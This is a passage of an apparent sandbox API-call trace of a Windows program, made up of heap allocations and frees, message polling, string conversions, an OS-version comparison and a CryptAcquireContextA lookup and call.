RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0086.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0086.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0086.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0086.511] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0086.511] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684c8 | out: hHeap=0x2af0000) returned 1 [0086.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0086.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0086.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0086.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0086.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0086.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0086.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0086.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0086.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0086.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0086.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0086.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0086.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0086.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0086.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0086.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0086.514] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.514] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0086.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a778f0 | out: hHeap=0x2af0000) returned 1 [0086.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0086.514] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0086.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0086.514] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0086.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a778f0 | out: hHeap=0x2af0000) returned 1 [0086.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0086.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0086.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0086.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0086.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0086.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0086.514] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0086.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0086.514] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0086.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0086.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0086.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0086.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0086.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0086.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0086.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0086.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0086.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0086.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0086.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0086.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0086.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0086.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0086.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0086.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0086.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0086.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0086.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0086.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0086.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0086.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0086.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0086.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0086.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0086.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a778f0 | out: hHeap=0x2af0000) returned 1 [0086.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0086.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0086.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0086.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0086.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0086.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0086.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0086.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0086.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0086.515] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0086.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0086.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0086.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0086.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0086.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0086.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0086.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0086.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0086.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0086.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0086.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0086.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0086.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0086.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0086.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0086.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0086.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0086.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0086.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0086.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0086.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0086.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0086.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0086.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0086.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0086.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0086.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6ea0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0086.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0086.516] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0086.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0086.517] GetProcAddress (hModule=0x76390000, lpProcName="CryptAcquireContext") returned 0x0 [0086.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0086.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0086.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0086.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6680 [0086.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0086.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0086.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0086.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x15) returned 0x29f71e0 [0086.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f71e0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0086.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0086.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0086.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0086.517] GetProcAddress (hModule=0x76390000, lpProcName="CryptAcquireContextA") returned 0x763afc40 [0086.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0086.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0086.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6680 | out: hHeap=0x2af0000) returned 1 [0086.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0086.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6e80 [0086.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0086.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0086.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0086.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0086.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0086.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0086.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0086.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0086.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0086.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0086.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0086.518] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9961a8) returned 1 [0086.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0086.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0086.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0086.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0086.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0086.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0086.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0086.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0086.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0086.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0086.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0086.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0086.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0086.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0086.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0086.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0086.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0086.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0086.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0086.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0086.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0086.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0086.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0086.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0086.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0086.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0086.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ce8 [0086.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0086.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0086.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0086.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0086.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0086.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0086.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0086.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0086.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0086.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0086.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0086.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0086.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0086.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0086.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0086.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0086.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0086.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0086.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0086.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0086.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0086.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0086.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0086.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a778f0 | out: hHeap=0x2af0000) returned 1 [0086.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0086.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0086.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0086.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7698 [0086.520] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0086.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0086.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0086.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7020 [0086.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0086.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0086.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0086.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0086.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0086.521] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a778f0 [0086.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0086.521] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0086.521] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0086.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0086.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0086.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0086.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0086.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0086.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0086.521] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0086.521] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0086.521] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0086.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0086.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0086.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0086.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 